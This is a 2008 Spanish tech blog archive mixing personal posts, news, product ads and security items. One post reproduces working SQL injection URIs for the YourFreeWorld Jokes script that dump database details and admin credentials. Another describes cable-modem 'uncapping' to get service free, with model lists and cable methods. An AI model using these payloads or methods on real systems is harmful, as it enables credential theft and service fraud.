viernes, 28 de noviembre de 2008

Balazos en el TEC de Culiacan

Ni en la escuela estamos seguros

Hoy a las 6:35 pm estaba exponiendo muy agusto en la materia de Teoría de Telecomunicaciones, en el aula habíamos tan sólo cuatro personas participando, pero muy atentos al tema. Antes de entrar a la exposicíon, un grupo de alrededor 10 personas fuimos testigos de un hecho inexplicable, se trataba de un avistamiento ovni que consistía en dos lues que permanecían estáticas a una altura de 600-900 mts. Dichas luces parecían provenir de dos estrellas, pero la luz era muy potente y por lo tanto descartamos esa posibilidad. Algunos de nosotros pensamos que posiblemente podría ser algún planeta o meteorito, pero esa teoría quedó descartada debido a que permanecían éstáticos en el cielo durante gran cantidad de tiempo y encendían y apagaban sus luces. Muchos otros podrían pensar en globos, pero esa teoría también se descarto debido a que parecían estar fijos en el cielo y con gran luminosidad. Sinceramente nunca había visto algo similar. Eso si, los objetos estaban muy distantes y no pudimos percibir alguna forma del objeto.

Tiempo despúés del avistamiento, entramos a la clase de Teoría de Telecomunicaciones a exponer el tema de Impacto de las Telecomunicaciones en el Hogar. Al llegar a la mitad de la exposición empezamos a escuchar detonaciones de arma AK-47 mejor conocida como cuerno de chivo. Yo con cierta incredulidad y desconcierto, intrrumpí la exposición durante la duración de las detonaciones del arma... Escuchamos aproximadamente tres ráfagas del arma de fuego. Algunos de los compañeros del instituto corrieron a resguardarse dentro de las instalaciones, otros que se encontraban cerca del lugar de los hechos sólo alcanzaron a tirarse al suelo.

Pasada la ráfaga continué con mi exposición, a ver si para la otra avisan... no sean maleducados!

Tiempo después me trasladé a mi domicilio... donde uno de los compañeros se encontraba sin palabras, eso debido a lo sucedido a las afueras del instituto justo por la avenida Juan de Dios Batiz.

Ya más tarde leí el periódico electrónico del debate, a ver si se comentaba algo al respecto... y en efecto, se trataba de un atentado a un funcionario de seguridad pública que según "el debate" sólo recibió algunos rasguños y heridas menores en la cara y brazo provocadas por las esquirlas de las balas.

Tengan mucho cuidado, cuando presenten una situación similar. Conserven la calma, y sobre todo reporten los hechos, ya conocen los números y lo pueden hacer de forma anónima. De perdida para que asista una ambulancia y salve a la gente inocente que nada tiene que ver con estas acciones.
Aprovecho este medio para exigir a las autoridades, mayor seguridad ya que ni en nuestras escuelas estamos seguros. Yo se que tal vez esto sea un grito al cielo, pero tenemos que cambiar nosotros para poder mejorar esta ciudad que cada día se ve más inmiscuida en la corrupción, violencia, narcotráfico y otros nales que aquejan a culiacán.
Gracias a dios al parecer no hubo muertos, puros chismes que decían los mitoteros... Lástima que haya sido esta nota la del fin de semana... por cierto, lo del ovni si es cierto, ocurrió minutos antes de los balazos... Hay compañeros ingenieros como testigos.
Nos vemos! Niños, cuiden a sus papás...

viernes, 21 de noviembre de 2008

Quiero subir la Memoria Ram de mi Laptop o de mi PC, pero como saber cual lleva?

Ya no se preocupe por eso. Si no quiere buscar los manuales o hacerle la autopsia a su computadora, solo descargue este sencillo programa y LISTO!!!

CPU Z: http://www.cpuid.com/cpuz.php Es gratuito y muy pequeño

Despues de bajarlo y descomprimirlo, puede borrar todos los archivos y quedarse solo con el programa "CPU Z" y dar doble click en el.

Cuando lo abre, se ve algo como esto:

Le da click a la lengueta que dice "Memory" y vera esto:

Ahi ya tiene todos los datos que necesita de su Memoria, desde el tamaño, la Frecuencia, el numero de Slots, etc. La frecuencia se multiplica por 2, ejemplo esta: 200Mhz x 2 = 400MHZ , PC3200. Tambien dice el Fabricante y el Tipo de Memoria, como esta que es Kingmax DDR SDRAM.

Otro cosa que debe tener en cuenta al comprar una Memoria es el Disipador de Aluminio, muchas ya lo traen sin ningun costo extra, como esta GEIL DDR2.

Recuerde que para comprar Memorias Ram no solo es el tamaño, tambien es importante el Overclock, Con tanto juego nuevo, cada vez mas gente lo hace y muy pocas Memorias como la Corsair tienen esa caracteristica.

Via Guias de MercadoLibre

Anuncios en YouTube, Yahoo, Nuevas Versiones De SketchUp Y




Videos con anuncios en YouTube, el presidente de Yahoo abandona el cargo, Listas las nuevas versiones de SketchUp, Windows se suma al almacenamiento gratis, nueva campaña de Give 1, get 1 compra y dona, Un tierno altavoz

Google renueva su buscador con SearchWiki

Google tiene previsto renovar su buscador con nuevas e interesantes funcionalidades de personalización de los resultados.

Google SearchWiki nos permitirá personalizar a nuestro gusto los resultados, insertar notas en los mismos, comentarlos, reordenarlos e incluso eliminarlos si no nos interesan.

Una personalización que lógicamente solo podrá ser llevada a cabo por usuarios registrados, debidamente autentificados y en sus respectivas cuentas.

No obstante hemos de tener en cuenta que las notas y comentarios efectuadas por nosotros pueden ser también visualizadas por el resto de usuarios que además incluso podrán comentarlas.

El funcionamiento no puede ser más sencillo, ya que en cada uno de los resultados aparecerán un par de flechas y en el pie de página se situara el enlace para añadir resultados y al lado de cada uno la opción de eliminarlo.

En principio las valoraciones proporcionadas en SearchWiki no influirán en el orden de los resultados de búsqueda del resto de usuarios, aunque es bastante improbable que Google no valore la opinión de cientos de miles de usuarios....

Como podéis ver son cambios sustanciales en el buscador, que se abre a una vertiente social, imprescindible si quiere seguir siendo la referencia de Internet en cuanto a búsqueda.

De momento la nueva funcionalidad tan solo aparecen en algunos usuarios seleccionados, aunque es bastante probable que en breve se generalice al resto de las cuentas.

Vía GoogleBlog

iPhone es vulnerable, la version de Safari su navegador por defecto permite realizar una llamada involuntaria

Collin Mulliner ha descubierto un fallo en iPhone que permite realizar llamadas involuntariamente con sólo pulsar sobre un enlace. Lo terrorífico, es que las llamadas no se pueden cancelar con ningún botón ni virtual ni físico.

Según lo descubierto por Mulliner, un atacante puede inducir al usuario a pulsar sobre un enlace HTTP aparentemente inofensivo, y comenzar a marcar. Habitualmente, para prevenir precisamente llamadas "accidentales", aparece un cuadro de diálogo que permite al usuario decidir si realmente quiere establecer la conexión. Esta vulnerabilidad permite saltarse ese cuadro de diálogo (aunque aparezca) y la llamada comenzará en cualquier caso. Lo preocupante es que además no hay forma de cortarla. Los botones físicos no responden y en la pantalla no se podrá pulsar ningún otro botón virtual. No se han publicado los detalles, aunque existe un vídeo como prueba de concepto.

Este método puede resultar muy lucrativo para atacantes si esa llamada se realiza a números de tarificación adicional. El usuario establecerá la conexión y no podrá colgar. En este caso el atacante sólo tendría que enviar enlaces por email al cliente de correo del propio iPhone, publicar enlaces en páginas web que sean visitadas con Safari, o incluso enviarlo por SMS.

Los diseñadores de Apple han trasladado al mundo de la telefonía un error (y un temor) común que arrastran los navegadores desde hace años, con el daño potencial que esto conlleva. En un navegador "tradicional" de un sobremesa, uno de los mayores temores es la ejecución de código a través del navegador con sólo visitar un enlace, y que además ese enlace esté "camuflado" de forma que el usuario no sepa de antemano qué va a ocurrir. Llevado al iPhone, aunque pueda ser muy lucrativo ejecutar código en el propio sistema operativo del teléfono, se obtendría un beneficio mucho más directo a través de llamadas involuntarias a números de tarificación adicional (80X en España). Los usuarios de iPhone deben tener en cuenta otra vez a los "dialers". Con el agravante de que en este caso particular no hay necesidad de estar infectado, basta con pulsar en un enlace. Al igual que ocurría a finales de los 90, cuando la conexión a Internet se realizaba mayoritariamente a través de módems que permitían marcar números de teléfono, pero con una tecnología tan avanzada como el iPhone.

Al parecer Apple ya corrigió un error muy parecido hace algunas semanas, pero por lo visto no ha sido suficiente. Mulliner no ha dado los detalles de la vulnerabilidad, pero asegura que cualquiera con conocimientos básicos de HTML podría llegar a realizar el ataque. Probablemente juegue con marcos ocultos y el protocolo tel:// que permite marcar "desde Safari" en el iPhone. El fallo es que ha conseguido saltarse la confirmación de llamada y además bloquear el sistema. Al parecer no es suficiente con deshabilitar el JavaScript para estar prevenido.

El investigador ha esperado a que Apple haya publicado la actualización 2.2 de su firmware que corrige el fallo además de muchas otras graves vulnerabilidades. El mismo Mulliner demostró en el verano de 2006 en la DefCon, cómo era posible desarrollar un gusano que infectase los dispositivos móviles con Windows CE de forma automática y transparente, sin la necesidad de que el usuario interviniese.

Sicherheitslücke: iPhone wählt selbständig Abzocke-Nummer
http://www.sit.fraunhofer.de/pressedownloads/pressemitteilungen/iPhoneHack.jsp

domingo, 16 de noviembre de 2008

Traduciendo buscadores robóticos



Hoy, en la Dosis Diaria...

Google incorpora la posibilidad de traducción para feeds.

Presentamos SmartTable, la mesa que permite a los niños aprender tocando.

Refseek, el buscador de temas científicos.

RoboBlood es un robot "casi humano" para hacer prácticas de medicina.

Y por último, qué hacer con dos WiiFit, dos Lego MindStorms, y mucho tiempo: microfútbol geek.

Y llegó el fin de semana --¡sed felices! :)

Via
http://www.mobuzz.es

Actualizaciones de safari

La versión 3.2 de Safari corrige hasta 11 fallos de seguridad
Después de que Mozilla publicara recientemente una actualización de seguridad para su navegador Firefox, ahora le ha llegado el turno a Safari. Apple acaba de lanzar la versión 3.2 de su navegador en la que se corrigen hasta 12 vulnerabilidades, algunas de ellas catalogadas como críticas ya que podrían permitir la ejecución de código de forma remota. Recordamos que la última revisión de seguridad de Safari fue publicada a finales del mes de Junio.
Los problemas solventados en la versión 3.2 de Safari se pueden dividir en dos bloques, los que están causados por fallos en WebKit, el motor de navegación de código abierto contenido en Safari, y los propios de Safari, que son los expuestos en primer lugar:

1- Múltiples vulnerabilidades en la librería zlib 1.2.2 que podrían causar una denegación de servicio.

2- Denegación de servicio o ejecución remota de código arbitrario al procesar documentos XML especialmente manipulados. El fallo está causado por un desbordamiento de búfer basado en heap en la librería libxslt.

3- Se ha encontrado un fallo de desbordamiento de búfer basado en heap en el manejador de espacios de color de CoreGraphics. La vulnerabilidad podría ser aprovechada para hacer que la aplicación se cierre de forma inesperada o para ejecutar código arbitrario si un usuario visualiza una imagen especialmente manipulada.

4- Se han encontrado múltiples intentos de acceso a memoria no inicializada al hacer uso de la librería libtiff para intentar procesar imágenes TIFF codificadas con LZW. Esto podría ser aprovechado para hacer que Safari se cerrase de forma inesperada o para ejecutar código arbitrario, si un usuario visualiza una imagen especialmente manipulada.

5- Existe un fallo de corrupción de memoria durante el procesado que hace ImageIO de imágenes TIFF especialmente manipuladas. Esto podría ser aprovechado por un atacante remoto para ejecutar código arbitrario o causar una denegación de servicio en la aplicación.

6- Denegación de servicio o ejecución remota de código arbitrario causada por una corrupción de memoria en ImageIO al procesar imágenes JPEG especialmente manipuladas que contengan perfiles ICC.

7- Desbordamiento de búfer causado por el procesamiento de forma errónea de imágenes que contengan un perfil ICC. Esto podría ser aprovechado por un atacante remoto para ejecutar código arbitrario o hacer que Safari se cierre de forma inesperada.

8- Revelación de información sensible a usuarios locales a través de la caché del navegador.

A continuación se detallan los fallos del motor de navegación WebKit:

9- Acceso a memoria fuera de límites causado por un manejo erróneo de los índices de arrays JavaScript en Safari. Esto podría ser aprovechado por un atacante remoto para ejecutar código arbitrario o causar una denegación de servicio si se visita un página web especialmente modificada.

10- Denegación de servicio o ejecución remota de código causada por un fallo de corrupción de memoria en Webcore al manejar hojas de estilos.

11- Revelación de información sensible aprovechándose de que el interfaz de plugins de WebKit no bloquea el acceso a URLs locales desde los propios plugins.

Todos los problemas mencionados afectarían a las versiones de Safari para Windows, mientras que sólo los cuatro últimos afectarían a las distintas versiones del navegador para el sistema operativo de Apple, Mac OS X.

Se recomienda actualizar a la versión 3.2 de Safari, disponible a través de la característica de auto actualización, y para las distintas plataformas desde:

Safari 3.2 for Windows:
http://www.apple.com/support/downloads/safari32forwindows.html


Safari 3.2 for Tiger:
http://www.apple.com/support/downloads/safari32fortiger.html


Safari 3.2 for Leopard:
http://www.apple.com/support/downloads/safari32forleopard.html

domingo, 9 de noviembre de 2008

Lista de Trackers (Tracker List) - BitTorrent

A continuación les muestro una lista de los mejores Trackers para la red de BitTorrent. Si conocen algunos que no agregué aqui, por favor coméntenlo y con mucho gusto lo agrego a la lista.
Esta lista de Trackers sirve para aumentar la cantidad de peers detectados por nuestro cliente de BitTorrent y de esta manera aumentar la velocidad de descarga de los archivos.
http://www.spanishtracker.com:2710/announce
http://tracker.mightynova.com:4315/announce
http://210.51.33.28:6969/announce
http://tpb.tracker.thepiratebay.org/announce
http://64.62.145.163:6969/announce
http://dididave.com/announce.php
http://www.dutchrevenge.org/announce.php
http://cw.enlightning.de:6969/announce
http://thepeerhub.com/announce.php
http://desiclub.in:6969/announce
http://fdisk.projektas.in/announce.php
http://tracker.gotwoot.net:6968/announce
http://inferno.demonoid.com:3389/announce
http://inferno.demonoid.com:3391/announce
http://www.caservers.net:6969/announce
http://tracker.scarywater.net:443/announce
http://www.digitalhive.org/announce.php
http://www.filemp3.org/announce.php
http://www.myspleen.net/announce.php
http://shadowshq.yi.org:6969/announce
http://tracker.datorrents.com:6969/announce.php
http://torrent-tatty.org/announce.php
http://www.oggfrog.com:6969/announce
http://www.quorks.com/announce.php
http://tracker.adultsins.net:7039/announce.php
http://homemadeporntorrents.com/announce.php
http://danishbits.org/announce.php
http://supremetorrents.co.uk/announce.php
http://lyjak.waw.pl/announce.php
http://islamictorrents.net/announce.php
http://bithq.org/announce.php
http://tracker.bigtorrent.com:6969/announce
http://bean-crisis.org/tt2/announce.php
http://special.pwtorrents.net/announce.php
http://tracker.boxtorrents.com:2710/announce.php
http://www.bitsoup.org/announce.php
http://badbits.org/announce.php
http://www.ilovetorrents.com/announce.php
http://www.kinozal.com/TK/announce.php
http://bt.edwardk.info:6969/announce
http://www.deviloid.net:6969/announce
http://tpb.tracker.prq.to/announce
http://zombtracker.the-zomb.com/announce.php
http://www.eddie4.nl:6969/announce
http://trackerB.zcultfm.com:6969/announce
udp://inferno.demonoid.com:3391/announce
http://www.bitnation.com/announce.php
http://ptfiles.org/announce.php
http://www.underground-gamer.com/announce.php
http://torrentheaven.dyn.pl/announce.php
Comenten que cliente BitTorrent les ha funcionado mejor, en lo personal uso BitComet.

Un disco duro en la palma de tu mano


Disco USB Passport 320GB Western Digital


Western Digital Disco Duro Externo WD Passport® 320 GB, 2.5" USB 2.0 Diseño ultra-portátil

Este disco duro es pequeño pero que eso no te confunda, ya que tiene la capacidad de almacenar 320 GB de datos, cuenta con conexión USB para que lo puedas conectar rápidamente a tu equipo de cómputo y puedas llevar tus datos a todas partes.

Agregue almacenamiento portátil instantáneo para todos sus archivos de trabajo, música, vídeos y juegos con una unidad de disco duro USB portátil WD Passport. Con capacidad de 320 GB, esta unidad compacta cabe fácilmente en su bolso o bolsillo, pesa sólo unos gramos y tiene capacidad para toneladas de datos valiosos. Como la unidad recibe alimentación directamente a través del cable USB, no es necesario llevar un adaptador de alimentación.

WD comprende la importancia de la información de su unidad, así que ha diseñado una cubierta elegante y resistente para proteger la unidad de disco duro WD de 2.5 pulgadas, así como los datos guardados en ella. Incluye software de sincronización y cifrado, así como de Google?

Características clave:
Fácil - La instalación es instantánea porque en realidad usted no tiene que "instalar" esta unidad, basta conectarla y estará lista para usar. No tiene CD de instalación. El software incluido se carga desde la unidad la primera vez que la conecta.

Inteligente - Energizado por bus USB. No se necesita fuente de alimentación externa.*
articulo nuevo
Más espacio - Una capacidad de hasta 320 GB significa que usted puede llevar consigo, a donde quiera que vaya, aún más de sus fotos, videos, archivos y música.

Ultra-portátiles - Esta compacta unidad cabe fácilmente en su bolsillo o en su bolso de mano, pesa sólo unas cuantas onzas y almacena toneladas de valiosos datos.

Sincronizado y seguro - El software WD Sync? de sincronización y cifrado le permite llevar sus datos críticos con usted. Conecte su unidad de disco WD Passport en cualquier PC, edite archivos, lea e-mail y vea sus fotos. Luego sincronice todos sus cambios de vuelta en su computadora del hogar o la oficina. Sus datos están protegidos con cifrado de 128 bits. (Únicamente Windows)
portatil disco duro
Incluye software Google? - Haga búsquedas en su unidad, administre sus fotos y simplifique las búsquedas en la Web con el software Google incluido. (Sólo para Windows)

Almacenamiento con estilo - Diseñado con una caja color negro brillante para crear un perfecto estilo de almacenamiento.

Compatible - Úselo con computadoras Windows® y Macintosh®

* Para las pocas computadoras que limitan la energía del bus, está disponible un adaptador de corriente opcional.

Ideal para

* Lleve archivos importantes y e-mail entre su trabajo y su hogar o de viaje
* Comparta archivos grandes entre la oficina y su hogar o entre una Mac y una PC
* Respaldo del disco duro existente en su notebook para seguridad adicional


especificaciones tecnicas
Este dispositivo tiene un costo aproximado de $2,500.00 MXN

Consultar más información(verificar precios).
Adquirir uno.

¿Qué es uncap, uncapping o uncapear? ¿Cómo aumentar la velocidad la conexión cable?

Uncapping o Uncap son técnicas para poder modificar la configuración de un cable modem que originalmente viene bloqueado de fábrica (actualizar firmware, modificar parámetros, HFC Mac Address, Config File, etc.). Esta técnica es usada con fines poco éticos, es decir, su motivación es acceder de forma gratuita al servicio de internet. También es usado para conseguir obtener mayores velocidades de conexión, tanto de bajada como de subida.

En la actualidad los modems más usados por los operadores de cable son los vulnerables a este tipo de técnicas: Motorola, 3Com, Thomson, RCA, WebStar y COM21, entre otros.

Motorola:

* Serie Eurodocsis
o Motorola sb4100e
o Motorola sb4101e
o Motorola sb4200e
o Motorola sb5100e
o Motorola sb5101e
o Motorola sb5120e

* Serie Docsis
o Motorola sb3100, sb3100i y sb3100d
o Motorola sb4100 y sb4100i
o Motorola sb4101 y sb4101i
o Motorola sb4200 y sb4200i
o Motorola sb5100 y sb5100i
o Motorola sb5101 y sb5101i
o Motorola sb5120
o Motorola sbg900

3Com:

* Serie Eurodocsis/docsis
o 3Com "Aleta de tiburón"

Thomson / RCA:

* Serie Eurodocsis/docsis
o TCM290
o TCM410
o TCM420
o TCM425

WebStar:

* Serie Eurodocsis/docsis
o EPC2k100r2
o EPC2100

COM21:

* Serie Eurodocsis/docsis
o COM21 DOXPORT 1000 series


Para acceder a las opciones ocultas de configuración, es decir, cambiar HFC MAC Address, Config File, Número de serie, se emplea un cable llamado Blackcat, especialmente para los cable modem Motorola SB5100 y SB5101, y en menor medida para los SB4200, SB4101 y SB4100 (sean todos de la serie DOCSIS o EURODOCSIS). Para estos tres últimos, es más adecuado programarlos con un cable Serial fabricado con el chip MAX232 o MAX233, sirviendo este cable inclusive para el cable modem Motorola SB3100.

Links de interés:

* Cable blackcat SB5101
* Cable blackcat SB5100
* Cable serial MAX232


Fuente: megaunder.com.ar

Software necesario: TECNiSO.Net

viernes, 7 de noviembre de 2008

YourFreeWorld Jokes Site Script 'categorie' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/jokesite/jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),user(),char(58),version()),char)/*

http://www.example.com/jokes.php?catagorie=-5+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password)+from+adminsettings--

fuente:
http://www.securityfocus.com/bid/28963/exploit

Una dosis mas... para los geeks (Internet Interplanetario)



Hoy repasamos Pixbox, un p2p comercial para los aficionados a las descargas.Crea tus propios videoclips con Animoto. Desde lo profundo del espacio (o no), Interplanetary Intern...

Videorama 3M MPro 110 microproyector

jueves, 6 de noviembre de 2008

Wi-Fi - Wireless

Wi-Fi es un sistema de envío de datos sobre redes computacionales que utiliza ondas de radio en lugar de cables.
Wi-Fi es una marca de la Wi-Fi Alliance (anteriormente la
WECA: Wireless Ethernet Compatibility Alliance), la organización comercial que adopta, prueba y certifica que los equipos cumplen los estándares 802.11.
Historia
Nokia y Symbol Technologies crearon en 1999 una asociación conocida como WECA (Wireless Ethernet Compatibility Alliance, Alianza de Compatibilidad Ethernet Inalámbrica). Esta asociación pasó a denominarse Wi-Fi Alliance en 2003 . El objetivo de la misma fue crear una marca que permitiese fomentar más fácilmente la tecnología inalámbrica y asegurar la compatibilidad de equipos.
De esta forma en abril de 2000
WECA certifica la interoperatibilidad de equipos según la norma IEEE 802.11b bajo la marca Wi-Fi . El término viene de Wireless Fidelity que es un equivalente a Hi-Fi High Fidelity que se usa en la grabacion de sonido. Esto quiere decir que el usuario tiene la garantía de que todos los equipos que tengan el sello Wi-Fi pueden trabajar juntos sin problemas, independientemente del fabricante de cada uno de ellos. Se puede obtener un listado completo de equipos que tienen la certificación Wi-Fi en Alliance - Certified Products.
En el año 2002 la asociación
WECA estaba formada ya por casi 150 miembros en su totalidad.
La norma
IEEE 802.11 fue diseñada para sustituir el equivalente a las capas físicas y MAC de la norma 802.3 (Ethernet). Esto quiere decir que en lo único que se diferencia una red Wi-Fi de una red Ethernet es en cómo se transmiten las tramas o paquetes de datos; el resto es idéntico. Por tanto, una red local inalámbrica 802.11 es completamente compatible con todos los servicios de las redes locales (LAN) de cable 802.3 (Ethernet).
El término Wi-Fi no proviene de Wíreless Fidelity. La
WECA contrató a una empresa de publicidad para que le diera un nombre a su estándar, de tal manera que fuera fácil de identificar y recordar. Phil Belanger, miembro fundador de Wi-Fi Alliance que apoyó el nombre Wi-Fi escribió:
‘’Wi-Fi y el "Style logo" del Ying Yang fueron inventados por la agencia Interbrand. Nosotros (WiFi Alliance) contratamos Interbrand para que nos hiciera un logotipo y un nombre que fuera corto, tuviera mercado y fuera fácil de recordar. Necesitábamos algo que fuera algo más llamativo que “IEEE 802.11b de Secuencia Directa”. Interbrand creó nombres como "Prozac", "Compaq", "OneWorld", "Imation", por mencionar algunas. Incluso inventaron un nombre para la compañía: VIVATO.’’
Estandares Existentes
Existen diversos tipos de Wi-Fi, basado cada uno de ellos en un estándar IEEE 802.11 aprobado. Son los siguientes:
Los estándares
IEEE 802.11b e IEEE 802.11g disfrutan de una aceptación internacional debido a que la banda de 2.4 GHz está disponible casi universalmente, con una velocidad de hasta 11 Mbps y 54 Mbps, respectivamente.
En la actualidad ya se maneja también el estándar
IEEE 802.11a, conocido como WIFI 5, que opera en la banda de 5 GHz y que disfruta de una operatividad con canales relativamente limpios. La banda de 5 GHz ha sido recientemente habilitada y, además no existen otras tecnologías (Bluetooth, microondas, ZigBee, WUSB) que la estén utilizando, por lo tanto existen muy pocas interferencias. Su alcance es algo menor que el de los estándares que trabajan a 2.4 GHz (aproximadamente un 10%), debido a que la frecuencia es mayor (a mayor frecuencia, menor alcance).
Un primer borrador del estándar
IEEE 802.11n que trabaja a 2.4 GHz a una velocidad de 108 Mbps. Sin embargo, el estándar 802.11g es capaz de alcanzar ya transferencias a 108 Mbps, gracias a diversas técnicas de aceleramiento. Actualmente existen ciertos dispositivos que permiten utilizar esta tecnología, denominados Pre-N, sin embargo, no se sabe si serán compatibles ya que el estándar no está completamente revisado y aprobado.
Existen otras tecnologías inalámbricas como Bluetooth que también funcionan a una frecuencia de 2.4 GHz, por lo que puede presentar interferencias con Wi-Fi Debido a esto, en la versión 1.2 del estándar Bluetooth por ejemplo se actualizó su especificación para que no existieran interferencias con la utilización simultánea de ambas tecnologías, además se necesita tener 40.000 k de velocidad.
Seguridad
Uno de los problemas más graves a los cuales se enfrenta actualmente la tecnología Wi-Fi es la seguridad. Un muy elevado porcentaje de redes son instaladas sin tener en consideración la seguridad convirtiendo así sus redes en redes abiertas (o muy vulnerables a los crackers), sin proteger la información que por ellas circulan.
Existen varias alternativas para garantizar la
seguridad de estas redes. Las más comunes son:
Utilización de
protocolos de cifrado de datos para los estándares Wi-Fi como el WEP y el WPA, que se encargan de codificar la información transmitida para proteger su confidencialidad, proporcionados por los propios dispositivos inalámbricos
WEP, cifra los datos en su red de forma que sólo el destinatario deseado pueda acceder a ellos. Los cifrados de 64 y 128 bits son dos niveles de seguridad WEP. WEP codifica los datos mediante una “clave” de cifrado antes de enviarlo al aire.
WPA: presenta mejoras como generación dinámica de la clave de acceso. Las claves se insertan como de dígitos alfanuméricos, sin restricción de longitud
IPSEC ([[túneles IP) en el caso de las VPN y el conjunto de estándares IEEE 802.1X, que permite la autenticación y autorización de usuarios.
Filtrado de
MAC, de manera que sólo se permite acceso a la red a aquellos dispositivos autorizados.
Ocultación del punto de acceso: se puede ocultar el punto de acceso (
Router) de manera que sea invisible a otros usuarios.
El protocolo de seguridad llamado
WPA2 (estándar 802.11i), que es una mejora relativa a WPA. En principio es el protocolo de seguridad más seguro para Wi-Fi en este momento. Sin embargo requieren hardware y software compatibles, ya que los antiguos no lo son.
Sin embargo, no existe ninguna alternativa fiable 100%, ya que todas ellas se pueden burlar.
Dispositivos
Existen varios dispositivos que permiten interconectar elementos Wi-Fi, de forma que puedan interactuar entre sí. Entre ellos destacan los routers, puntos de acceso, para la emisión de la señal Wi-Fi y las tarjetas receptoras para conectar a la computadora personal, ya sean internas (tarjetas PCI) o bien USB.
Los
puntos de acceso funcionan a modo de emisor remoto, es decir, en lugares donde la señal Wi-Fi del router no tenga suficiente radio se colocan estos dispositivos, que reciben la señal bien por un cable UTP que se lleve hasta él o bien que capturan la señal débil y la amplifican (aunque para este último caso existen aparatos especializados que ofrecen un mayor rendimiento).
Los
router son los que reciben la señal de la línea ofrecida por el operador de telefonía. Se encargan de todos los problemas inherentes a la recepción de la señal, incluidos el control de errores y extracción de la información, para que los diferentes niveles de red puedan trabajar. Además, el router efectúa el reparto de la señal, de forma muy eficiente.
Además de
routers, hay otros dispositivos que pueden encargarse de la distribución de la señal, aunque no pueden encargarse de las tareas de recepción, como pueden ser hubs y switches. Estos dispositivos son mucho más sencillos que los routers, pero también su rendimiento en la red de área local es muy inferior
Los dispositivos de recepción abarcan tres tipos mayoritarios: tarjetas
PCI, tarjetas PCMCIA y tarjetas USB:
1) Las tarjetas PCI para Wi-Fi se agregan a los ordenadores de sobremesa. Hoy en día están perdiendo terreno debido a las tarjetas USB.
2) Las tarjetas
PCMCIA son un modelo que se utilizó mucho en los primeros ordenadores portátiles, aunque están cayendo en desuso, debido a la integración de tarjeta inalámbricas internas en estos ordenadores. La mayor parte de estas tarjetas solo son capaces de llegar hasta la tecnología B de Wi-Fi, no permitiendo por tanto disfrutar de una velocidad de transmisión demasiado elevada
3) Las tarjetas
USB para Wi-Fi son el tipo de tarjeta más común que existe y más sencillo de conectar a un pc, ya sea de sobremesa o portátil, haciendo uso de todas las ventajas que tiene la tecnología USB. Además, algunas ya ofrecen la posibilidad de utilizar la llamada tecnología PreN, que aún no esta estandarizada.
4) También existen impresoras, cámaras Web y otros periféricos que funcionan con la tecnología Wi-Fi, permitiendo un ahorro de mucho cableado en las instalaciones de redes.
En relación con los drivers, existen directorios de "
Chipsets de adaptadores Wireless".
Ventajas y desventajas

Una de las desventajas que tiene el sistema Wi-Fi es la pérdida de velocidad en comparación a una conexión con cables, debido a las interferencias y pérdidas de señal que el ambiente puede acarrear.
La desventaja fundamental de estas redes existe en el campo de la seguridad. Existen algunos programas capaces de capturar paquetes, trabajando con su tarjeta Wi-Fi en modo promiscuo, de forma que puedan calcular la contraseña de la
red y de esta forma acceder a ella. Las claves de tipo WEP son relativamente fáciles de conseguir con este sistema. La alianza Wi-Fi arregló estos problemas sacando el estándar WPA y posteriormente WPA2, basados en el grupo de trabajo 802.11i. Las redes protegidas con WPA2 se consideran robustas dado que proporcionan muy buena seguridad. De todos modos muchas compañías no permiten a sus empleados tener una red inalámbrica ya que sigue siendo difícil para lo que representa la seguridad de una empresa estar "seguro". Uno de los puntos débiles (sino el gran punto débil) es el hecho de no poder controlar el área que la señal de la red cubre, por esto es posible que la señal exceda el perímetro del edificio y alguien desde afuera pueda visualizar la red y esto es sin lugar a dudas una mano para el posible atacante.
Hay que señalar que esta tecnología no es compatible con otros tipos de conexiones sin cables como
Bluetooth, GPRS, UMTS, etc.
Los dispositivos Wi-Fi ofrecen gran comodidad en relación a la movilidad que ofrece esta tecnología.
Véase También

Vulnerabilidad (bug)


Para vulnerabilidades informáticas, véase bug


En términos de desastres por fenómenos naturales, tenemos que la vulnerabilidad es una medida de que tan susceptible es un bien expuesto a ser afectado por un fenómeno perturbador, por ejemplo, una casa construida con madera es más vulnerable que una construida con concreto a un tornado. La vulnerabilidad es evaluada dependiendo del bien que se esta analizando y el fenómeno que es capaz de dañarle.


En términos de Seguridad de la Información, una vulnerabilidad es una debilidad en los procedimientos de seguridad, diseño, implementación o control interno que podría ser explotada (accidental o intencionalmente) y que resulta en una brecha de seguridad o una violación de la política de seguridad de sistemas.


Una posible definición sencilla de vulnerabilidad podría ser:


"Por vulnerabilidad entendemos las características de una persona o grupo desde el punto de vista de su capacidad para anticipar, sobrevivir, resistir y recuperarse del impacto de una amenaza natural. Implica una combinación de factores que determinan el grado hasta el cual la vida y la subsistencia de alguien queda en riesgo por un evento distinto e identificable de la naturaleza o de la sociedad."


Es importante señalar que durante el periodo 1999-2003, la Comisión Económica para America Latina (
CEPAL) realizó una serie de estudios tanto de caracter teórico como de investigación aplicada en el cual se trató de lograr varias aproximaciones al termino de Vulnerabilidad, como al termino vulnerabilidad con adjetivos, principalmente "vulnerabilidad social" y "vulnerabilidad sociodemográfica".
Aunque posteriormente, se ha seguido usando el termino vulnerabilidad, dentro de los documentos de la CEPAL han desaparecido casi totalmente las menciones a los conceptos de "vulnerabilidad social" y "vulnerabilidad sociodemográfica".

lunes, 3 de noviembre de 2008

Cuidado con el software que se "auto actualiza"

Una herramienta que permite crear ataques "a medida" contra algunos servicios de actualización de programas en línea, parece estar disponible en Internet. Tenga cuidado cuando intente actualizar el software que figura en la lista de productos afectados.

El kit, llamado Evilgrade, es capaz de generar ataques del tipo "man-in-the-middle", o sea "hombre en el medio" o intermediario.

Esto es, cuando el usuario cree estar descargando la actualización de un sitio original, usando el propio programa que desea actualizar para ello, alguien o algo en el medio, intercepta esta comunicación, pudiendo infectar el equipo de la víctima con un programa malicioso.

Los atacantes dicen haber implementado módulos para los siguientes productos (note que existen errores en algunos de estos nombres, ya que así figuran en el propio README.TXT de la herramienta):

- Java plugin
- Winzip
- Winamp
- MacOS
- OpenOffices
- iTunes
- Linkedin Toolbar
- DAP [Download Accelerator]
- notepad++
- speedbit

Todos estos programas tienen en común, que no realizan un control estricto de que las actualizaciones descargadas sean las correctas o no se valen de firmas digitales fuertes para comprobar su autenticidad.

Los ataques utilizan varias técnicas, incluida la que aprovecha la vulnerabilidad en servidores DNS que tanto se habla en estos días.

